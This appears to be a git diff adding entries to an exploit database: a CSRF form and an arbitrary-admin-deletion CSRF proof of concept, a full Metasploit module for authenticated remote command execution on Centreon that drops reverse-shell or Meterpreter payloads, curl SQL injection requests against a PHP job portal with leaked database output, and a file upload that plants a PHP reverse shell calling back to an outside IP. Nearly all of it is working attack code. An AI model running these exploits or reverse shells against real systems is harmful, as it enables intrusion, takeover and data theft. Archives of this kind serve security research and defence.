+      <input type="hidden" name="13&#95;17" value="13&#95;17" />
+      <input type="hidden" name="13&#95;4" value="13&#95;4" />
+      <input type="hidden" name="13&#95;5" value="13&#95;5" />
+      <input type="hidden" name="13&#95;6" value="13&#95;6" />
+      <input type="hidden" name="13&#95;18" value="13&#95;18" />
+      <input type="hidden" name="13&#95;7" value="13&#95;7" />
+      <input type="hidden" name="13&#95;8" value="13&#95;8" />
+      <input type="hidden" name="13&#95;9" value="13&#95;9" />
+      <input type="hidden" name="13&#95;19" value="13&#95;19" />
+      <input type="hidden" name="13&#95;20" value="13&#95;20" />
+      <input type="hidden" name="13&#95;10" value="13&#95;10" />
+      <input type="hidden" name="13&#95;11" value="13&#95;11" />
+      <input type="hidden" name="13&#95;12" value="13&#95;12" />
+      <input type="hidden" name="13&#95;21" value="13&#95;21" />
+      <input type="hidden" name="13&#95;22" value="13&#95;22" />
+      <input type="hidden" name="13&#95;13" value="13&#95;13" />
+      <input type="hidden" name="13&#95;14" value="13&#95;14" />
+      <input type="hidden" name="13&#95;15" value="13&#95;15" />
+      <input type="hidden" name="13&#95;16" value="13&#95;16" />
+      <input type="hidden" name="13&#95;108" value="13&#95;108" />
+      <input type="hidden" name="13&#95;23" value="13&#95;23" />
+      <input type="hidden" name="13&#95;101" value="13&#95;101" />
+      <input type="hidden" name="13&#95;102" value="13&#95;102" />
+      <input type="hidden" name="13&#95;103" value="13&#95;103" />
+      <input type="hidden" name="13&#95;104" value="13&#95;104" />
+      <input type="hidden" name="13&#95;106" value="13&#95;106" />
+      <input type="hidden" name="13&#95;105" value="13&#95;105" />
+      <input type="hidden" name="14&#95;p" value="14&#95;p" />
+      <input type="hidden" name="14&#95;1" value="14&#95;1" />
+      <input type="hidden" name="14&#95;2" value="14&#95;2" />
+      <input type="hidden" name="14&#95;3" value="14&#95;3" />
+      <input type="hidden" name="14&#95;101" value="14&#95;101" />
+      <input type="hidden" name="14&#95;4" value="14&#95;4" />
+      <input type="hidden" name="14&#95;5" value="14&#95;5" />
+      <input type="hidden" name="14&#95;6" value="14&#95;6" />
+      <input type="hidden" name="14&#95;102" value="14&#95;102" />
+      <input type="hidden" name="14&#95;7" value="14&#95;7" />
+      <input type="hidden" name="14&#95;8" value="14&#95;8" />
+      <input type="hidden" name="14&#95;9" value="14&#95;9" />
+      <input type="hidden" name="14&#95;103" value="14&#95;103" />
+      <input type="hidden" name="14&#95;10" value="14&#95;10" />
+      <input type="hidden" name="14&#95;21" value="14&#95;21" />
+      <input type="hidden" name="14&#95;104" value="14&#95;104" />
+      <input type="hidden" name="14&#95;11" value="14&#95;11" />
+      <input type="hidden" name="14&#95;105" value="14&#95;105" />
+      <input type="hidden" name="14&#95;12" value="14&#95;12" />
+      <input type="hidden" name="14&#95;106" value="14&#95;106" />
+      <input type="hidden" name="14&#95;13" value="14&#95;13" />
+      <input type="hidden" name="14&#95;14" value="14&#95;14" />
+      <input type="hidden" name="14&#95;15" value="14&#95;15" />
+      <input type="hidden" name="14&#95;16" value="14&#95;16" />
+      <input type="hidden" name="14&#95;107" value="14&#95;107" />
+      <input type="hidden" name="14&#95;17" value="14&#95;17" />
+      <input type="hidden" name="14&#95;18" value="14&#95;18" />
+      <input type="hidden" name="14&#95;19" value="14&#95;19" />
+      <input type="hidden" name="14&#95;20" value="14&#95;20" />
+      <input type="hidden" name="15&#95;p" value="15&#95;p" />
+      <input type="hidden" name="15&#95;1" value="15&#95;1" />
+      <input type="hidden" name="15&#95;2" value="15&#95;2" />
+      <input type="hidden" name="15&#95;3" value="15&#95;3" />
+      <input type="hidden" name="16&#95;p" value="16&#95;p" />
+      <input type="hidden" name="16&#95;1" value="16&#95;1" />
+      <input type="hidden" name="16&#95;2" value="16&#95;2" />
+      <input type="hidden" name="16&#95;3" value="16&#95;3" />
+      <input type="hidden" name="16&#95;101" value="16&#95;101" />
+      <input type="hidden" name="16&#95;4" value="16&#95;4" />
+      <input type="hidden" name="16&#95;5" value="16&#95;5" />
+      <input type="hidden" name="16&#95;6" value="16&#95;6" />
+      <input type="hidden" name="16&#95;102" value="16&#95;102" />
+      <input type="hidden" name="16&#95;7" value="16&#95;7" />
+      <input type="hidden" name="16&#95;8" value="16&#95;8" />
+      <input type="hidden" name="16&#95;10" value="16&#95;10" />
+      <input type="hidden" name="16&#95;11" value="16&#95;11" />
+      <input type="hidden" name="16&#95;12" value="16&#95;12" />
+      <input type="hidden" name="16&#95;103" value="16&#95;103" />
+      <input type="hidden" name="16&#95;13" value="16&#95;13" />
+      <input type="hidden" name="16&#95;14" value="16&#95;14" />
+      <input type="hidden" name="16&#95;15" value="16&#95;15" />
+      <input type="hidden" name="16&#95;17" value="16&#95;17" />
+      <input type="hidden" name="16&#95;18" value="16&#95;18" />
+      <input type="hidden" name="16&#95;20" value="16&#95;20" />
+      <input type="hidden" name="16&#95;21" value="16&#95;21" />
+      <input type="hidden" name="16&#95;24" value="16&#95;24" />
+      <input type="hidden" name="16&#95;104" value="16&#95;104" />
+      <input type="hidden" name="16&#95;105" value="16&#95;105" />
+      <input type="hidden" name="16&#95;22" value="16&#95;22" />
+      <input type="hidden" name="16&#95;25" value="16&#95;25" />
+      <input type="hidden" name="16&#95;23" value="16&#95;23" />
+      <input type="hidden" name="16&#95;26" value="16&#95;26" />
+      <input type="hidden" name="16&#95;106" value="16&#95;106" />
+      <input type="hidden" name="16&#95;107" value="16&#95;107" />
+      <input type="hidden" name="16&#95;27" value="16&#95;27" />
+      <input type="hidden" name="16&#95;28" value="16&#95;28" />
+      <input type="hidden" name="16&#95;29" value="16&#95;29" />
+      <input type="hidden" name="17&#95;p" value="17&#95;p" />
+      <input type="hidden" name="17&#95;1" value="17&#95;1" />
+      <input type="hidden" name="17&#95;6" value="17&#95;6" />
+      <input type="hidden" name="17&#95;2" value="17&#95;2" />
+      <input type="hidden" name="17&#95;3" value="17&#95;3" />
+      <input type="hidden" name="17&#95;101" value="17&#95;101" />
+      <input type="hidden" name="17&#95;4" value="17&#95;4" />
+      <input type="hidden" name="17&#95;5" value="17&#95;5" />
+      <input type="hidden" name="17&#95;7" value="17&#95;7" />
+      <input type="hidden" name="17&#95;8" value="17&#95;8" />
+      <input type="hidden" name="17&#95;9" value="17&#95;9" />
+      <input type="hidden" name="18&#95;p" value="18&#95;p" />
+      <input type="hidden" name="18&#95;5" value="18&#95;5" />
+      <input type="hidden" name="18&#95;1" value="18&#95;1" />
+      <input type="hidden" name="18&#95;2" value="18&#95;2" />
+      <input type="hidden" name="18&#95;3" value="18&#95;3" />
+      <input type="hidden" name="18&#95;4" value="18&#95;4" />
+      <input type="hidden" name="18&#95;6" value="18&#95;6" />
+      <input type="hidden" name="18&#95;7" value="18&#95;7" />
+      <input type="hidden" name="18&#95;8" value="18&#95;8" />
+      <input type="hidden" name="18&#95;9" value="18&#95;9" />
+      <input type="hidden" name="18&#95;10" value="18&#95;10" />
+      <input type="hidden" name="18&#95;11" value="18&#95;11" />
+      <input type="hidden" name="18&#95;12" value="18&#95;12" />
+      <input type="hidden" name="19&#95;p" value="19&#95;p" />
+      <input type="hidden" name="19&#95;1" value="19&#95;1" />
+      <input type="hidden" name="19&#95;2" value="19&#95;2" />
+      <input type="hidden" name="19&#95;3" value="19&#95;3" />
+      <input type="hidden" name="19&#95;4" value="19&#95;4" />
+      <input type="hidden" name="19&#95;5" value="19&#95;5" />
+      <input type="hidden" name="19&#95;6" value="19&#95;6" />
+      <input type="hidden" name="19&#95;11" value="19&#95;11" />
+      <input type="hidden" name="19&#95;7" value="19&#95;7" />
+      <input type="hidden" name="19&#95;12" value="19&#95;12" />
+      <input type="hidden" name="19&#95;13" value="19&#95;13" />
+      <input type="hidden" name="19&#95;14" value="19&#95;14" />
+      <input type="hidden" name="19&#95;15" value="19&#95;15" />
+      <input type="hidden" name="19&#95;101" value="19&#95;101" />
+      <input type="hidden" name="19&#95;102" value="19&#95;102" />
+      <input type="hidden" name="19&#95;8" value="19&#95;8" />
+      <input type="hidden" name="19&#95;16" value="19&#95;16" />
+      <input type="hidden" name="19&#95;9" value="19&#95;9" />
+      <input type="hidden" name="19&#95;10" value="19&#95;10" />
+      <input type="hidden" name="19&#95;17" value="19&#95;17" />
+      <input type="hidden" name="19&#95;18" value="19&#95;18" />
+      <input type="hidden" name="20&#95;p" value="20&#95;p" />
+      <input type="hidden" name="20&#95;1" value="20&#95;1" />
+      <input type="hidden" name="20&#95;5" value="20&#95;5" />
+      <input type="hidden" name="20&#95;101" value="20&#95;101" />
+      <input type="hidden" name="20&#95;2" value="20&#95;2" />
+      <input type="hidden" name="20&#95;6" value="20&#95;6" />
+      <input type="hidden" name="20&#95;102" value="20&#95;102" />
+      <input type="hidden" name="20&#95;3" value="20&#95;3" />
+      <input type="hidden" name="20&#95;4" value="20&#95;4" />
+      <input type="hidden" name="21&#95;p" value="21&#95;p" />
+      <input type="hidden" name="21&#95;1" value="21&#95;1" />
+      <input type="hidden" name="21&#95;2" value="21&#95;2" />
+      <input type="hidden" name="21&#95;3" value="21&#95;3" />
+      <input type="hidden" name="22&#95;p" value="22&#95;p" />
+      <input type="hidden" name="22&#95;1" value="22&#95;1" />
+      <input type="hidden" name="22&#95;2" value="22&#95;2" />
+      <input type="hidden" name="22&#95;3" value="22&#95;3" />
+      <input type="hidden" name="22&#95;5" value="22&#95;5" />
+      <input type="hidden" name="22&#95;4" value="22&#95;4" />
+      <input type="hidden" name="22&#95;6" value="22&#95;6" />
+      <input type="hidden" name="23&#95;p" value="23&#95;p" />
+      <input type="hidden" name="24&#95;p" value="24&#95;p" />
+      <input type="hidden" name="24&#95;1" value="24&#95;1" />
+      <input type="hidden" name="24&#95;2" value="24&#95;2" />
+      <input type="hidden" name="24&#95;3" value="24&#95;3" />
+      <input type="hidden" name="24&#95;4" value="24&#95;4" />
+      <input type="hidden" name="25&#95;p" value="25&#95;p" />
+      <input type="hidden" name="25&#95;1" value="25&#95;1" />
+      <input type="hidden" name="25&#95;2" value="25&#95;2" />
+      <input type="hidden" name="25&#95;5" value="25&#95;5" />
+      <input type="hidden" name="25&#95;6" value="25&#95;6" />
+      <input type="hidden" name="25&#95;3" value="25&#95;3" />
+      <input type="hidden" name="25&#95;4" value="25&#95;4" />
+      <input type="hidden" name="25&#95;7" value="25&#95;7" />
+      <input type="hidden" name="25&#95;8" value="25&#95;8" />
+      <input type="hidden" name="26&#95;p" value="26&#95;p" />
+      <input type="hidden" name="26&#95;1" value="26&#95;1" />
+      <input type="hidden" name="26&#95;2" value="26&#95;2" />
+      <input type="hidden" name="27&#95;p" value="27&#95;p" />
+      <input type="hidden" name="27&#95;1" value="27&#95;1" />
+      <input type="hidden" name="27&#95;2" value="27&#95;2" />
+      <input type="hidden" name="27&#95;3" value="27&#95;3" />
+      <input type="hidden" name="28&#95;p" value="28&#95;p" />
+      <input type="hidden" name="28&#95;1" value="28&#95;1" />
+      <input type="hidden" name="28&#95;2" value="28&#95;2" />
+      <input type="hidden" name="28&#95;3" value="28&#95;3" />
+      <input type="hidden" name="28&#95;4" value="28&#95;4" />
+      <input type="hidden" name="28&#95;5" value="28&#95;5" />
+      <input type="hidden" name="29&#95;p" value="29&#95;p" />
+      <input type="hidden" name="29&#95;1" value="29&#95;1" />
+      <input type="hidden" name="29&#95;2" value="29&#95;2" />
+      <input type="hidden" name="30&#95;p" value="30&#95;p" />
+      <input type="hidden" name="30&#95;1" value="30&#95;1" />
+      <input type="hidden" name="30&#95;2" value="30&#95;2" />
+      <input type="hidden" name="30&#95;3" value="30&#95;3" />
+      <input type="hidden" name="30&#95;4" value="30&#95;4" />
+      <input type="hidden" name="30&#95;5" value="30&#95;5" />
+      <input type="hidden" name="30&#95;6" value="30&#95;6" />
+      <input type="hidden" name="30&#95;7" value="30&#95;7" />
+      <input type="hidden" name="30&#95;8" value="30&#95;8" />
+      <input type="hidden" name="31&#95;p" value="31&#95;p" />
+      <input type="hidden" name="31&#95;1" value="31&#95;1" />
+      <input type="hidden" name="31&#95;2" value="31&#95;2" />
+      <input type="hidden" name="31&#95;3" value="31&#95;3" />
+      <input type="hidden" name="31&#95;5" value="31&#95;5" />
+      <input type="hidden" name="31&#95;4" value="31&#95;4" />
+      <input type="hidden" name="32&#95;p" value="32&#95;p" />
+      <input type="hidden" name="32&#95;3" value="32&#95;3" />
+      <input type="hidden" name="32&#95;1" value="32&#95;1" />
+      <input type="hidden" name="32&#95;4" value="32&#95;4" />
+      <input type="hidden" name="32&#95;2" value="32&#95;2" />
+      <input type="hidden" name="32&#95;5" value="32&#95;5" />
+      <input type="hidden" name="33&#95;p" value="33&#95;p" />
+      <input type="hidden" name="33&#95;1" value="33&#95;1" />
+      <input type="hidden" name="33&#95;2" value="33&#95;2" />
+      <input type="hidden" name="33&#95;3" value="33&#95;3" />
+      <input type="hidden" name="33&#95;8" value="33&#95;8" />
+      <input type="hidden" name="33&#95;4" value="33&#95;4" />
+      <input type="hidden" name="33&#95;5" value="33&#95;5" />
+      <input type="hidden" name="33&#95;6" value="33&#95;6" />
+      <input type="hidden" name="33&#95;7" value="33&#95;7" />
+      <input type="hidden" name="34&#95;p" value="34&#95;p" />
+      <input type="hidden" name="34&#95;1" value="34&#95;1" />
+      <input type="hidden" name="34&#95;2" value="34&#95;2" />
+      <input type="hidden" name="35&#95;p" value="35&#95;p" />
+      <input type="hidden" name="35&#95;1" value="35&#95;1" />
+      <input type="hidden" name="35&#95;2" value="35&#95;2" />
+      <input type="hidden" name="35&#95;3" value="35&#95;3" />
+      <input type="hidden" name="saveallowance" value="Submit" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+Proof of Concept for the arbitrary user deletion:
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://SITEHERE/office_admin/">
+      <input type="hidden" name="pid" value="42" />
+      <input type="hidden" name="action" value="deleteadmin" />
+      <input type="hidden" name="lid" value="90" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/47994.rb b/exploits/php/webapps/47994.rb
new file mode 100755
index 000000000..294fa6710
--- /dev/null
+++ b/exploits/php/webapps/47994.rb
@@ -0,0 +1,311 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Centreon Poller Authenticated Remote Command Execution',
+      'Description' => %q{
+        TODO
+      },
+      'Author' => [
+        'Omri Baso', # discovery
+        'Fabien Aunay', # discovery
+        'mekhalleh (RAMELLA Sébastien)' # this module
+      ],
+      'References' => [
+        # TODO: waiting for CVE
+        ['EDB', '47977']
+      ],
+      'DisclosureDate' => '2020-01-27',
+      'License' => MSF_LICENSE,
+      'Platform' => ['linux', 'unix'],
+      'Arch' => [ARCH_CMD, ARCH_X64],
+      'Privileged' => true,
+      'Targets' => [
+        ['Reverse shell (In-Memory)',
+          'Platform' => 'unix',
+          'Type' => :cmd_unix,
+          'Arch' => ARCH_CMD,
+          'DefaultOptions' => {
+            'PAYLOAD' => 'cmd/unix/reverse_bash'
+          }
+        ],
+        ['Meterpreter (Dropper)',
+          'Platform' => 'linux',
+          'Type' => :meterpreter,
+          'Arch' => ARCH_X64,
+          'DefaultOptions' => {
+            'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
+            'CMDSTAGER::FLAVOR' => 'curl' # illegal characters: `~$^&"|'<>
+          }
+        ]
+      ],
+      'DefaultTarget' => 0,
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'Reliability' => [REPEATABLE_SESSION],
+        'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+      }
+    ))
+
+    register_options([
+      OptString.new('PASSWORD', [true, 'The Centreon Web panel password to authenticate with']),
+      OptString.new('TARGETURI', [true, 'The URI of the Centreon Web panel path', '/centreon']),
+      OptString.new('USERNAME', [true, 'The Centreon Web panel username to authenticate with'])
+    ])
+  end
+
+  def create_new_poller(poller_name, command_id)
+    print_status("Create new poller entry on the target.")
+    token = get_token(normalize_uri(target_uri.path, 'main.get.php'), {'p' => '60901'})
+    return false unless token
+
+    response = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'main.get.php?p=60901'),
+      'cookie' => @cookies,
+      'partial' => true,
+      'vars_post'   => {
+        'name' => poller_name,
+        'ns_ip_address' => '127.0.0.1',
+        'localhost[localhost]' => '1',
+        'is_default[is_default]' => '0',
+        'remote_id' => '',
+        'ssh_port' => '22',
+        'remote_server_centcore_ssh_proxy[remote_server_centcore_ssh_proxy]' => '1',
+        'engine_start_command' => 'service centengine start',
+        'engine_stop_command' => 'service centengine stop',
+        'engine_restart_command' => 'service centengine restart',
+        'engine_reload_command' => 'service centengine reload',
+        'nagios_bin' => '/usr/sbin/centengine',
+        'nagiostats_bin' => '/usr/sbin/centenginestats',
+        'nagios_perfdata' => '/var/log/centreon-engine/service-perfdata',
+        'broker_reload_command' => 'service cbd reload',
+        'centreonbroker_cfg_path' => '/etc/centreon-broker',
+        'centreonbroker_module_path' => '/usr/share/centreon/lib/centreon-broker',
+        'centreonbroker_logs_path' => '/var/log/centreon-broker',
+        'centreonconnector_path' => '',
+        'init_script_centreontrapd' => 'centreontrapd',
+        'snmp_trapd_path_conf' => '/etc/snmp/centreon_traps/',
+        'pollercmd[0]' => command_id,
+        'clone_order_pollercmd_0' => '',
+        'ns_activate[ns_activate]' => '1',
+        'submitA' => 'Save',
+        'id' => '',
+        'o' => 'a',
+        'centreon_token' => token
+      }
+    )
+    return false unless response
+
+    return true
+  end
+
+  def execute_command(command, opts = {})
+    cmd_name = rand_text_alpha(8..42)
+    poller_name = rand_text_alpha(8..42)
+
+    ## Register a miscellaneous command.
+    print_status("Upload command payload on the target.")
+    token = get_token(normalize_uri(target_uri.path, 'main.get.php'), {'p' => '60803', 'type' => '3'})
+    return false unless token
+
+    response = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'main.get.php?p=60803&type=3'),
+      'cookie' => @cookies,
+      'partial' => true,
+      'vars_post'   => {
+        'command_name' => cmd_name,
+        'command_type[command_type]' => '3',
+        'command_line' => command,
+        'resource' => '$CENTREONPLUGINS$',
+        'plugins' => '/Centreon/SNMP',
+        'macros' => '$ADMINEMAIL$',
+        'command_example' => '',
+        'listOfArg' => '',
+        'listOfMacros' => '',
+        'connectors' => '',
+        'graph_id' => '',
+        'command_activate[command_activate]' => '1',
+        'command_comment' => '',
+        'submitA' => 'Save',
+        'command_id' => '',
+        'type' => '3',
+        'o' => 'a',
+        'centreon_token' => token
+      }
+    )
+    return false unless response
+
+    ## Create new poller to serve the payload.
+    create_new_poller(poller_name, get_command_id(cmd_name))
+    poller_id = get_poller_id(poller_name)
+
+    ## Export configuration to reload to trigger the exploit.
+    unless poller_id.nil?
+      restart_exportation(poller_id)
+    end
+  end
+
+  def get_auth
+    print_status("Send authentication request.")
+    token = get_token(normalize_uri(target_uri.path, 'index.php'))
+    unless token.nil?
+      response = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'index.php'),
+        'cookie' => @cookies,
+        'vars_post'  => {
+          'useralias' => datastore['USERNAME'],
+          'password' => datastore['PASSWORD'],
+          'submitLogin' => 'Connect',
+          'centreon_token' => token
+        }
+      )
+      return false unless response
+
+      if response.redirect?
+        if response.headers['location'].include?('main.php')
+          print_status('Successful authenticated.')
+          @cookies = response.get_cookies
+          return true
+        end
+      end
+    end
+
+    print_bad('Your credentials are incorrect.')
+    return false
+  end
+
+  def get_command_id(cmd_name)
+    response = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'main.get.php'),
+      'cookie' => @cookies,
+      'vars_get' => {
+          'p' => '60803',
+          'type' => '3'
+      }
+    )
+    return nil unless response
+
+    href = response.get_html_document.at("//a[contains(text(), \"#{cmd_name}\")]")['href']
+    return nil unless href
+
+    id = href.split('?')[1].split('&')[2].split('=')[1]
+    return id unless id.empty?
+
+    return nil
+  end
+
+  def get_poller_id(poller_name)
+    response = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'main.get.php'),
+      'cookie' => @cookies,
+      'vars_get' => {'p' => '60901'}
+    )
+    return nil unless response
+
+    href = response.get_html_document.at("//a[contains(text(), \"#{poller_name}\")]")['href']
+    return nil unless href
+
+    id = href.split('?')[1].split('&')[2].split('=')[1]
+    return id unless id.empty?
+
+    return nil
+  end
+
+  def get_session
+    response = send_request_cgi(
+      'method' => 'HEAD',
+      'uri' => normalize_uri(target_uri.path, 'index.php')
+    )
+    cookies = response.get_cookies
+    return cookies unless cookies.empty?
+  end
+
+  def get_token(uri, params = {})
+    ## Get centreon_token value.
+    request = {
+      'method' => 'GET',
+      'uri' => uri,
+      'cookie' => @cookies
+    }
+    request = request.merge({'vars_get' => params}) unless params.empty?
+    response = send_request_cgi(request)
+
+    return nil unless response
+    return response.get_html_document.at('input[@name="centreon_token"]')['value']
+  end
+
+  def restart_exportation(poller_id)
+    print_status("Reload the poller to trigger exploitation.")
+    token = get_token(normalize_uri(target_uri.path, 'main.get.php'), {'p' => '60902', 'poller' => poller_id})
+
+    vprint_status(' -- Generating files.')
+    unless token.nil?
+      response = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'include', 'configuration', 'configGenerate', 'xml', 'generateFiles.php'),
+        'cookie' => @cookies,
+        'vars_post' => {
+          'poller' => poller_id,
+          'debug' => 'true',
+          'generate' => 'true'
+        }
+      )
+      return nil unless response
+
+      vprint_status(' -- Restarting engine.')
+      response = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'include', 'configuration', 'configGenerate', 'xml', 'restartPollers.php'),
+        'cookie' => @cookies,
+        'vars_post' => {
+          'poller' => poller_id,
+          'mode' => '2'
+        }
+      )
+      return nil unless response
+
+      vprint_status(' -- Executing command.')
+      response = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'include', 'configuration', 'configGenerate', 'xml', 'postcommand.php'),
+        'cookie' => @cookies,
+        'vars_post' => {'poller' => poller_id}
+      )
+      return nil unless response
+    end
+  end
+
+  def check
+    # TODO: Detection by version number (waiting to know the impacted versions).
+  end
+
+  def exploit
+    ## TODO: check
+
+    @cookies = get_session
+    logged = get_auth unless @cookies.empty?
+    if logged
+      case target['Type']
+      when :cmd_unix
+        execute_command(payload.encoded)
+      when :meterpreter
+        execute_command(generate_cmdstager.join)
+      end
+    end
+  end
+
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/48007.txt b/exploits/php/webapps/48007.txt
new file mode 100644
index 000000000..a479a4bdd
--- /dev/null
+++ b/exploits/php/webapps/48007.txt
@@ -0,0 +1,56 @@
+# Exploit Title: Online Job Portal 1.0 - 'user_email' SQL Injection
+# Dork: N/A
+# Date: 2020-02-06
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
+# Version: 1.0
+# Tested on: Linux
+# CVE: N/A
+
+# POC: 
+# 1)
+# 
+curl -i -s -k -X $'POST' \
+    -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 282' -H $'Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
+    -b $'PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' \
+    --data-binary $'user_email=1\'%20aND%20(SeLeCT%201%20FRoM(SeLeCT%20CoUNT(*),CoNCaT((SeLeCT%20(eLT(2=2,1))),CoNCaT_WS(0x203a20,USeR(),DaTaBaSe(),veRSIoN()),FLooR(RaND(0)*2))x%20FRoM%20INFoRMaTIoN_SCHeMa.PLUGINS%20GRoUP%20BY%20x)a)--%20VerAyari&user_pass=0x5665724179617269&btnLogin=0x5665724179617269' \
+    $'http://localhost/[PATH]/admin/login.php'
+# 
+HTTP/1.1 200 OK
+Date: Wed, 05 Feb 2020 19:18:45 GMT
+Server: Apache/2.4.38 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
+X-Powered-By: PHP/5.6.40
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 3251
+Connection: close
+Content-Type: text/html; charset=UTF-8
+.............
+<!-- /.login-box -->
+Failed to get query handle: SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '1root@localhost : exploitdb : 10.1.38-MariaDB1' for key 'group_key'
+# 
+
+# POC: 
+# 2)
+# 
+curl -i -s -k -X $'POST' \
+    -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 237' -H $'Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
+    -b $'PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' \
+    --data-binary $'USERNAME=1\'%20aND%20(SeLeCT%201%20FRoM(SeLeCT%20CoUNT(*),CoNCaT((SeLeCT%20(eLT(2=2,1))),CoNCaT_WS(0x203a20,USeR(),DaTaBaSe(),veRSIoN()),FLooR(RaND(0)*2))x%20FRoM%20INFoRMaTIoN_SCHeMa.PLUGINS%20GRoUP%20BY%20x)a)--%20verayari&PASS=VerAyari' \
+    $'http://localhost/[PATH]/process.php?action=login'
+# 
+HTTP/1.1 200 OK
+Date: Wed, 05 Feb 2020 19:17:19 GMT
+Server: Apache/2.4.38 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
+X-Powered-By: PHP/5.6.40
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 167
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+Failed to get query handle: SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '1root@localhost : exploitdb : 10.1.38-MariaDB1' for key 'group_key'
+#
\ No newline at end of file
diff --git a/exploits/php/webapps/48012.txt b/exploits/php/webapps/48012.txt
new file mode 100644
index 000000000..893fe8b69
--- /dev/null
+++ b/exploits/php/webapps/48012.txt
@@ -0,0 +1,33 @@
+# Exploit Title: Online Job Portal 1.0 - Remote Code Execution
+# Dork: N/A
+# Date: 2020-02-06
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
+# Version: 1.0
+# Tested on: Linux
+# CVE: N/A
+
+# POC: 
+# 1)
+# 
+curl -i -s -k -X $'POST' \
+    -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: multipart/form-data; boundary=---------------------------1852293616672951051689730436' -H $'Content-Length: 781' -H $'Referer: http://localhost/[PATH]/admin/user/index.php?view=view' -H $'Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
+    -b $'PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' \
+    --data-binary $'-----------------------------1852293616672951051689730436\x0d\x0aContent-Disposition: form-data; name=\"mealid\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------1852293616672951051689730436\x0d\x0aContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\x0d\x0a\x0d\x0a1000000\x0d\x0a-----------------------------1852293616672951051689730436\x0d\x0aContent-Disposition: form-data; name=\"photo\"; filename=\"exp.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0aGIF89c;\x0d\x0a<?php $sock = fsockopen(\'192.168.1.104\',6666);\x0d\x0a$descriptorspec = array(\x0d\x0a0 => $sock,\x0d\x0a1 => $sock,\x0d\x0a2 => $sock\x0d\x0a);\x0d\x0a\x0d\x0a$process = proc_open(\'/bin/sh\', $descriptorspec, $pipes);\x0d\x0aproc_close($process);?>\x0d\x0a\x0d\x0a-----------------------------1852293616672951051689730436\x0d\x0aContent-Disposition: form-data; name=\"savephoto\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------1852293616672951051689730436--\x0d\x0a' \
